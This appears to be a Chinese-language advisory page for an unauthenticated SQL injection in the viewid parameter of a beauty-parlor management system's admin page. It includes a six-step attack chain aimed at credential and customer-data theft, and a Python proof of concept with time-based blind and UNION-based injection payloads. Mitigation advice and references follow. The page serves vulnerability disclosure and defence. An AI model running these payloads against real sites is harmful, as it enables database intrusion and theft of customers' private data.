CVE-2025-14990 Campcodes在线美容院管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14990

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Complete Online Beauty Parlor Management System 1.0

漏洞概述

CVE-2025-14990是Campcodes Complete Online Beauty Parlor Management System 1.0中存在的一个高危SQL注入漏洞。该系统是一款用于美容院管理的在线应用软件，提供了预约管理、客户管理、服务管理等核心功能。漏洞存在于管理后台的/admin/view-appointment.php文件中，具体是由于对viewid参数的输入验证不充分导致的。攻击者可以通过构造恶意的SQL语句 payload，在未经身份验证的情况下远程利用此漏洞，获取数据库中的敏感信息，包括客户个人信息、预约记录、财务数据等。由于该系统的管理后台通常包含大量商户核心业务数据，漏洞的成功利用可能导致严重的商业机密泄露和隐私数据外泄，对企业经营和客户隐私造成重大威胁。

技术细节

该SQL注入漏洞存在于/admin/view-appointment.php文件中的viewid参数。攻击者可以通过HTTP请求向该文件提交精心构造的SQL语句片段，实现对数据库的非授权访问和操作。由于系统未对viewid参数进行充分的输入过滤和SQL语句预编译处理，用户输入被直接拼接到SQL查询语句中执行。攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术手段，逐步提取数据库中的敏感数据。在某些配置下，攻击者甚至可能通过 INTO OUTFILE 或 INTO DUMPFILE 语句将恶意代码写入服务器，实现远程代码执行。攻击者通常首先通过手动注入测试确认漏洞存在性，然后逐步扩展注入点获取数据库版本信息、数据库名称、表结构等元数据，最终定位并提取管理员账户凭据等高价值数据。

攻击链分析

STEP 1

步骤1

扫描发现目标网站使用Campcodes Complete Online Beauty Parlor Management System 1.0

STEP 2

步骤2

访问/admin/view-appointment.php文件，识别可利用的参数viewid

STEP 3

步骤3

构造SQL注入payload，如使用单引号测试触发SQL语法错误

STEP 4

步骤4

通过布尔盲注或时间盲注技术逐步提取数据库结构和敏感数据

STEP 5

步骤5

获取管理员账户和密码哈希，进一步登录后台

STEP 6

步骤6

在后台进一步利用其他漏洞或直接窃取客户敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14990 SQL Injection PoC
# Target: Campcodes Complete Online Beauty Parlor Management System 1.0
# File: /admin/view-appointment.php
# Parameter: viewid

target_url = "http://target-site.com/admin/view-appointment.php"

# Blind SQL Injection payload to extract database version
payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"

params = {
    "viewid": payload
}

print("[*] Sending SQL Injection payload...")
try:
    response = requests.get(target_url, params=params, timeout=10)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerable! Time-based blind SQL injection confirmed.")
    else:
        print("[-] Target may not be vulnerable.")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Union-based injection payload for data extraction
union_payload = "-1' UNION SELECT NULL,NULL,NULL,NULL,NULL,version(),database(),user(),NULL,NULL,NULL,NULL-- -"
params_union = {"viewid": union_payload}
print("[*] Extracting database information...")

影响范围

Campcodes Complete Online Beauty Parlor Management System 1.0

防御指南

临时缓解措施

在正式补丁发布前，可采取以下临时缓解措施：1) 在Web应用防火墙中配置SQL注入检测规则，拦截包含可疑SQL语法的请求；2) 对/admin/view-appointment.php文件设置访问控制，限制只有授权管理员IP可访问；3) 暂时禁用view-appointment.php功能或将其从生产环境移除；4) 加强数据库监控，及时发现异常查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14990
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14990
3 Details https://www.cvedetails.com/cve/CVE-2025-14990/
4 VulDB https://vuldb.com/cve/CVE-2025-14990
5 Link https://github.com/funnnxxx/my-cve/issues/2
6 Link https://vuldb.com/?ctiid.337684
7 Link https://vuldb.com/?id.337684
8 Link https://vuldb.com/?submit.718453
9 Link https://www.campcodes.com/